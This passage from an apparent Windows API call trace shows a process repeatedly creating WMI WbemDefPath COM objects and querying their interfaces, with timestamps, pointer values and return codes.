Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x4e0f4f0 | out: ppvObject=0x4e0f4f0*=0x594510) returned 0x0 [0157.138] WbemDefPath:IUnknown:Release (This=0x596c98) returned 0x0 [0157.138] WbemDefPath:IUnknown:QueryInterface (in: This=0x594510, riid=0x693ade2c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x4e0f114 | out: ppvObject=0x4e0f114*=0x594510) returned 0x0 [0157.138] WbemDefPath:IUnknown:QueryInterface (in: This=0x594510, riid=0x69519c98*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x4e0f0d0 | out: ppvObject=0x4e0f0d0*=0x0) returned 0x80004002 [0157.138] WbemDefPath:IUnknown:QueryInterface (in: This=0x594510, riid=0x69519c88*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x4e0ecc4 | out: ppvObject=0x4e0ecc4*=0x0) returned 0x80004002 [0157.139] WbemDefPath:IUnknown:AddRef (This=0x594510) returned 0x3 [0157.139] WbemDefPath:IUnknown:QueryInterface (in: This=0x594510, riid=0x695198cc*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x4e0ea24 | out: ppvObject=0x4e0ea24*=0x0) returned 0x80004002 [0157.139] WbemDefPath:IUnknown:QueryInterface (in: This=0x594510, riid=0x69519820*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x4e0e9d4 | out: ppvObject=0x4e0e9d4*=0x0) returned 0x80004002 [0157.139] WbemDefPath:IUnknown:QueryInterface (in: This=0x594510, riid=0x693ba540*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x4e0e9e0 | out: ppvObject=0x4e0e9e0*=0x59a910) returned 0x0 [0157.139] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x59a910, riid=0x693ade2c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x4e0e9e8 | out: pCid=0x4e0e9e8*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0157.139] WbemDefPath:IUnknown:Release (This=0x59a910) returned 0x3 [0157.139] CoGetContextToken (in: pToken=0x4e0ea40 | out: pToken=0x4e0ea40) returned 0x0 [0157.139] CoGetContextToken (in: pToken=0x4e0ee48 | out: pToken=0x4e0ee48) returned 0x0 [0157.139] WbemDefPath:IUnknown:QueryInterface (in: This=0x594510, riid=0x69519b0c*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x4e0eed4 | out: ppvObject=0x4e0eed4*=0x0) returned 0x80004002 [0157.139] WbemDefPath:IUnknown:Release (This=0x594510) returned 0x2 [0157.139] WbemDefPath:IUnknown:Release (This=0x594510) returned 0x1 [0157.139] SetEvent (hEvent=0x3dc) returned 1 [0157.142] CoGetClassObject (in: rclsid=0x587b34*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x694f4d80*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x4e0f2c8 | out: ppv=0x4e0f2c8*=0x596d28) returned 0x0 [0157.142] WbemDefPath:IUnknown:QueryInterface (in: This=0x596d28, riid=0x694d79fc*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x4e0f4e4 | out: ppvObject=0x4e0f4e4*=0x0) returned 0x80004002 [0157.142] WbemDefPath:IClassFactory:CreateInstance (in: This=0x596d28, pUnkOuter=0x0, riid=0x693ade2c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x4e0f4f0 | out: ppvObject=0x4e0f4f0*=0x594580) returned 0x0 [0157.142] WbemDefPath:IUnknown:Release (This=0x596d28) returned 0x0 [0157.142] WbemDefPath:IUnknown:QueryInterface (in: This=0x594580, riid=0x693ade2c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x4e0f114 | out: ppvObject=0x4e0f114*=0x594580) returned 0x0 [0157.142] WbemDefPath:IUnknown:QueryInterface (in: This=0x594580, riid=0x69519c98*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x4e0f0d0 | out: ppvObject=0x4e0f0d0*=0x0) returned 0x80004002 [0157.142] WbemDefPath:IUnknown:QueryInterface (in: This=0x594580, riid=0x69519c88*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x4e0ecc4 | out: ppvObject=0x4e0ecc4*=0x0) returned 0x80004002 [0157.143] WbemDefPath:IUnknown:AddRef (This=0x594580) returned 0x3 [0157.143] WbemDefPath:IUnknown:QueryInterface (in: This=0x594580, riid=0x695198cc*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x4e0ea24 | out: ppvObject=0x4e0ea24*=0x0) returned 0x80004002 [0157.143] WbemDefPath:IUnknown:QueryInterface (in: This=0x594580, riid=0x69519820*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x4e0e9d4 | out: ppvObject=0x4e0e9d4*=0x0) returned 0x80004002 [0157.143] WbemDefPath:IUnknown:QueryInterface (in: This=0x594580, riid=0x693ba540*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x4e0e9e0 | out: ppvObject=0x4e0e9e0*=0x59ac88) returned 0x0 [0157.143] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x59ac88, riid=0x693ade2c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x4e0e9e8 | out: pCid=0x4e0e9e8*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0157.143] WbemDefPath:IUnknown:Release (This=0x59ac88) returned 0x3 [0157.143] CoGetContextToken (in: pToken=0x4e0ea40 | out: pToken=0x4e0ea40) returned 0x0 [0157.143] CoGetContextToken (in: pToken=0x4e0ee48 | out: pToken=0x4e0ee48) returned 0x0 [0157.143] WbemDefPath:IUnknown:QueryInterface (in: This=0x594580, riid=0x69519b0c*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x4e0eed4 | out: ppvObject=0x4e0eed4*=0x0) returned 0x80004002 [0157.143] WbemDefPath:IUnknown:Release (This=0x594580) returned 0x2 [0157.143] WbemDefPath:IUnknown:Release (This=0x594580) returned 0x1 [0157.143] SetEvent (hEvent=0x3e0) returned 1 [0158.194] CoGetClassObject (in: rclsid=0x587b34*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x694f4d80*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x4e0f2c8 | out: ppv=0x4e0f2c8*=0x596e08) returned 0x0 [0158.195] WbemDefPath:IUnknown:QueryInterface (in: This=0x596e08, riid=0x694d79fc*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x4e0f4e4 | out: ppvObject=0x4e0f4e4*=0x0) returned 0x80004002 [0158.195] WbemDefPath:IClassFactory:CreateInstance (in: This=0x596e08, pUnkOuter=0x0, riid=0x693ade2c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x4e0f4f0 | out: ppvObject=0x4e0f4f0*=0x594900) returned 0x0 [0158.195] WbemDefPath:IUnknown:Release (This=0x596e08) returned 0x0 [0158.195] WbemDefPath:IUnknown:QueryInterface (in: This=0x594900, riid=0x693ade2c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x4e0f114 | out: ppvObject=0x4e0f114*=0x594900) returned 0x0 [0158.195] WbemDefPath:IUnknown:QueryInterface (in: This=0x594900, riid=0x69519c98*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x4e0f0d0 | out: ppvObject=0x4e0f0d0*=0x0) returned 0x80004002 [0158.195] WbemDefPath:IUnknown:QueryInterface (in: This=0x594900, riid=0x69519c88*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x4e0ecc4 | out: ppvObject=0x4e0ecc4*=0x0) returned 0x80004002 [0158.195] WbemDefPath:IUnknown:AddRef (This=0x594900) returned 0x3 [0158.196] WbemDefPath:IUnknown:QueryInterface (in: This=0x594900, riid=0x695198cc*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x4e0ea24 | out: ppvObject=0x4e0ea24*=0x0) returned 0x80004002 [0158.196] WbemDefPath:IUnknown:QueryInterface (in: This=0x594900, riid=0x69519820*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x4e0e9d4 | out: ppvObject=0x4e0e9d4*=0x0) returned 0x80004002 [0158.196] WbemDefPath:IUnknown:QueryInterface (in: This=0x594900, riid=0x693ba540*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x4e0e9e0 | out: ppvObject=0x4e0e9e0*=0x59abb0) returned 0x0 [0158.196] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x59abb0, riid=0x693ade2c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x4e0e9e8 | out: pCid=0x4e0e9e8*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0158.196] WbemDefPath:IUnknown:Release (This=0x59abb0) returned 0x3 [0158.196] CoGetContextToken (in: pToken=0x4e0ea40 | out: pToken=0x4e0ea40) returned 0x0 [0158.196] CoGetContextToken (in: pToken=0x4e0ee48 | out: pToken=0x4e0ee48) returned 0x0 [0158.196] WbemDefPath:IUnknown:QueryInterface (in: This=0x594900, riid=0x69519b0c*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x4e0eed4 | out: ppvObject=0x4e0eed4*=0x0) returned 0x80004002 [0158.196] WbemDefPath:IUnknown:Release (This=0x594900) returned 0x2 [0158.196] WbemDefPath:IUnknown:Release (This=0x594900) returned 0x1 [0158.196] SetEvent (hEvent=0x430) returned 1 [0178.023] CoGetClassObject (in: rclsid=0x587b34*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x694f4d80*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x4e0f2c8 | out: ppv=0x4e0f2c8*=0x596cf8) returned 0x0 [0178.024] WbemDefPath:IUnknown:QueryInterface (in: This=0x596cf8, riid=0x694d79fc*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x4e0f4e4 | out: ppvObject=0x4e0f4e4*=0x0) returned 0x80004002 [0178.024] WbemDefPath:IClassFactory:CreateInstance (in: This=0x596cf8, pUnkOuter=0x0, riid=0x693ade2c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x4e0f4f0 | out: ppvObject=0x4e0f4f0*=0x594970) returned 0x0 [0178.024] WbemDefPath:IUnknown:Release (This=0x596cf8) returned 0x0 [0178.024] WbemDefPath:IUnknown:QueryInterface (in: This=0x594970, riid=0x693ade2c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x4e0f114 | out: ppvObject=0x4e0f114*=0x594970) returned 0x0 [0178.025] WbemDefPath:IUnknown:QueryInterface (in: This=0x594970, riid=0x69519c98*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x4e0f0d0 | out: ppvObject=0x4e0f0d0*=0x0) returned 0x80004002 [0178.025] WbemDefPath:IUnknown:QueryInterface (in: This=0x594970, riid=0x69519c88*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x4e0ecc4 | out: ppvObject=0x4e0ecc4*=0x0) returned 0x80004002 [0178.025] WbemDefPath:IUnknown:AddRef (This=0x594970) returned 0x3 [0178.028] WbemDefPath:IUnknown:QueryInterface (in: This=0x594970, riid=0x695198cc*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x4e0ea24 | out: ppvObject=0x4e0ea24*=0x0) returned 0x80004002 [0178.028] WbemDefPath:IUnknown:QueryInterface (in: This=0x594970, riid=0x69519820*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x4e0e9d4 | out: ppvObject=0x4e0e9d4*=0x0) returned 0x80004002 [0178.028] WbemDefPath:IUnknown:QueryInterface (in: This=0x594970, riid=0x693ba540*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x4e0e9e0 | out: ppvObject=0x4e0e9e0*=0x5ad270) returned 0x0 [0178.028] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x5ad270, riid=0x693ade2c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x4e0e9e8 | out: pCid=0x4e0e9e8*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0178.028] WbemDefPath:IUnknown:Release (This=0x5ad270) returned 0x3 [0178.028] CoGetContextToken (in: pToken=0x4e0ea40 | out: pToken=0x4e0ea40) returned 0x0 [0178.028] CoGetContextToken (in: pToken=0x4e0ee48 | out: pToken=0x4e0ee48) returned 0x0 [0178.028] WbemDefPath:IUnknown:QueryInterface (in: This=0x594970, riid=0x69519b0c*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x4e0eed4 | out: ppvObject=0x4e0eed4*=0x0) returned 0x80004002 [0178.028] WbemDefPath:IUnknown:Release (This=0x594970) returned 0x2 [0178.028] WbemDefPath:IUnknown:Release (This=0x594970) returned 0x1 [0178.029] SetEvent (hEvent=0x434) returned 1 [0178.075] CoGetClassObject (in: rclsid=0x587b34*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x694f4d80*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x4e0f2c8 | out: ppv=0x4e0f2c8*=0x596db8) returned 0x0 [0178.076] WbemDefPath:IUnknown:QueryInterface (in: This=0x596db8, riid=0x694d79fc*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x4e0f4e4 | out: ppvObject=0x4e0f4e4*=0x0) returned 0x80004002 [0178.076] WbemDefPath:IClassFactory:CreateInstance (in: This=0x596db8, pUnkOuter=0x0, riid=0x693ade2c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x4e0f4f0 | out: ppvObject=0x4e0f4f0*=0x594350) returned 0x0 [0178.076] WbemDefPath:IUnknown:Release (This=0x596db8) returned 0x0 [0178.076] WbemDefPath:IUnknown:QueryInterface (in: This=0x594350, riid=0x693ade2c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x4e0f114 | out: ppvObject=0x4e0f114*=0x594350) returned 0x0 [0178.076] WbemDefPath:IUnknown:QueryInterface (in: This=0x594350, riid=0x69519c98*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x4e0f0d0 | out: ppvObject=0x4e0f0d0*=0x0) returned 0x80004002 [0178.076] WbemDefPath:IUnknown:QueryInterface (in: This=0x594350, riid=0x69519c88*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x4e0ecc4 | out: ppvObject=0x4e0ecc4*=0x0) returned 0x80004002 [0178.076] WbemDefPath:IUnknown:AddRef (This=0x594350) returned 0x3 [0178.076] WbemDefPath:IUnknown:QueryInterface (in: This=0x594350, riid=0x695198cc*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x4e0ea24 | out: ppvObject=0x4e0ea24*=0x0) returned 0x80004002 [0178.076] WbemDefPath:IUnknown:QueryInterface (in: This=0x594350, riid=0x69519820*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x4e0e9d4 | out: ppvObject=0x4e0e9d4*=0x0) returned 0x80004002 [0178.077] WbemDefPath:IUnknown:QueryInterface (in: This=0x594350, riid=0x693ba540*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x4e0e9e0 | out: ppvObject=0x4e0e9e0*=0x5ad180) returned 0x0 [0178.077] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x5ad180, riid=0x693ade2c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x4e0e9e8 | out: pCid=0x4e0e9e8*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0178.077] WbemDefPath:IUnknown:Release (This=0x5ad180) returned 0x3 [0178.077] CoGetContextToken (in: pToken=0x4e0ea40 | out: pToken=0x4e0ea40) returned 0x0 [0178.077] CoGetContextToken (in: pToken=0x4e0ee48 | out: pToken=0x4e0ee48) returned 0x0 [0178.077] WbemDefPath:IUnknown:QueryInterface (in: This=0x594350, riid=0x69519b0c*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x4e0eed4 | out: ppvObject=0x4e0eed4*=0x0) returned 0x80004002 [0178.077] WbemDefPath:IUnknown:Release (This=0x594350) returned 0x2 [0178.077] WbemDefPath:IUnknown:Release (This=0x594350) returned 0x1 [0178.077] SetEvent (hEvent=0x438) returned 1 [0178.080] CoGetClassObject (in: rclsid=0x587b34*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x694f4d80*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x4e0f2c8 | out: ppv=0x4e0f2c8*=0x596db8) returned 0x0 [0178.080] WbemDefPath:IUnknown:QueryInterface (in: This=0x596db8, riid=0x694d79fc*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x4e0f4e4 | out: ppvObject=0x4e0f4e4*=0x0) returned 0x80004002 [0178.080] WbemDefPath:IClassFactory:CreateInstance (in: This=0x596db8, pUnkOuter=0x0, riid=0x693ade2c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x4e0f4f0 | out: ppvObject=0x4e0f4f0*=0x594200) returned 0x0 [0178.080] WbemDefPath:IUnknown:Release (This=0x596db8) returned 0x0 [0178.080] WbemDefPath:IUnknown:QueryInterface (in: This=0x594200, riid=0x693ade2c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x4e0f114 | out: ppvObject=0x4e0f114*=0x594200) returned 0x0 [0178.080] WbemDefPath:IUnknown:QueryInterface (in: This=0x594200, riid=0x69519c98*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x4e0f0d0 | out: ppvObject=0x4e0f0d0*=0x0) returned 0x80004002 [0178.080] WbemDefPath:IUnknown:QueryInterface (in: This=0x594200, riid=0x69519c88*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x4e0ecc4 | out: ppvObject=0x4e0ecc4*=0x0) returned 0x80004002 [0178.081] WbemDefPath:IUnknown:AddRef (This=0x594200) returned 0x3 [0178.081] WbemDefPath:IUnknown:QueryInterface (in: This=0x594200, riid=0x695198cc*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x4e0ea24 | out: ppvObject=0x4e0ea24*=0x0) returned 0x80004002 [0178.081] WbemDefPath:IUnknown:QueryInterface (in: This=0x594200, riid=0x69519820*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x4e0e9d4 | out: ppvObject=0x4e0e9d4*=0x0) returned 0x80004002 [0178.081] WbemDefPath:IUnknown:QueryInterface (in: This=0x594200, riid=0x693ba540*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, 